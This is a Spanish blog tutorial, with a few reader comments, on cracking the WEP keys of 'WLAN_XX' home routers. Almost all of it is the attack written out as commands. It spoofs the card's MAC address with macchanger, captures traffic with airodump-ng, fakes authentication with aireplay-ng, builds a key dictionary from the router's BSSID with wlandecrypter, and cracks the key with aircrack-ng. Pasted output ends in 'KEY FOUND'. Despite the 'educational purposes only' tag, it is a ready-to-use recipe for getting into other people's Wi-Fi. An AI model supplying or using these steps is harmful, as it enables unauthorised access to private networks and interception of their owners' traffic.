Asociación
1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
- airmon-ng stop eth1
2- Parar la tarjeta para poder fijarla en modo monitor.
- ifconfig eth1 down
3- Cambiar la ruta mac.
- macchanger --mac 00:11:22:33:44:55 eth1
4- Iniciar tarjeta en modo monitor.
- airmon-ng start eth1
5- Iniciar airodump para ver las redes inalámbricas disponibles.
- airodump-ng eth1
6- Iniciar airodump con la red especificada.
- airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1
Falsa autenticación
Si estas recibiendo paquetes, sobra hacer una falsa autentificación, si no, escribe:
- aireplay-ng -1 0 -e (nombre de la red) -a (El bssid) -h (Nuestra tarjeta mac o la del cliente conectado) eth1
Crackeo
Si estas interesado en el tema y quieres saber porqué los WLAN_XX son tan vulnerables, mira aquí.
- Crackear un WLAN_XX es tan simple como generar un diccionario a partir de la mac interna del router. Nos bastarán unos 3-4 iv's para adivinar ésta.
Escribimos:
- wlandecrypter "El bssid" "El essid" "el nombre del diccionario"
Nos quedaría, por ejemplo:
wlandecrypter 00:02:CF:XX:FC:51 WLAN_XX dic.txt
- Ahora vamos a emplear este diccionario junto al paquete de iv's.
Para ello, escribimos:
- aircrack-ng -w "ruta diccionario" "archivo .cap"
Nos quedaría:
aircrack-ng -w /root/dic.txt output-01.cap
Opening output-01.cap
Read 30730 packets.
# BSSID ESSID Encryption
1 00:02:CF:XX:FC:51 WLAN_XX WEP
Choosing first network as target.
Aircrack-ng 0.9.3
[00:00:00] Tested 0 keys (got 118 IVs)
Aircrack-ng 0.9.3
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ [00:00:00] Tested 2940 keys (got 118 IVs)
2 0/ 0 00( 0) 00Aircrack-ng 0.9.30( 0) 00( 0)
KB depth byte(vote)0( 0) 00( 0) 00( 0) 00( 0)
-...........-
KEY FOUND! [ 5a 30 30 30 32 43 46 45 38 31 43 58 58 ] (ASCII: Z00 02CFE81CXX )
Decrypted correctly: 100%
**TUTORIAL BY MONZI_SEZ**
EDUCATIONAL PURPOSES ONLY
*Más que nada este tutorial es un recordatorio para mí mismo, a veces me da pereza mirar la ayuda (por muy simple que sea .p ). Esto lo sabía ya hace muuucho tiempo pero como hoy me encontré una wlan_xx y no salía pues,, tuto XD.
hola,cuando en el paso de falsa autntificacion dices, nuestra tarjeta mac o la del cliente conectado,a que te refieres??? :S
ResponderEliminarBuen tutorial monzi!
ResponderEliminarGenial, no sabía cómo obligar a la tarjeta a apagarse antes de entrar en modo monitor "ifconfig eth1 down"
ResponderEliminarGracias!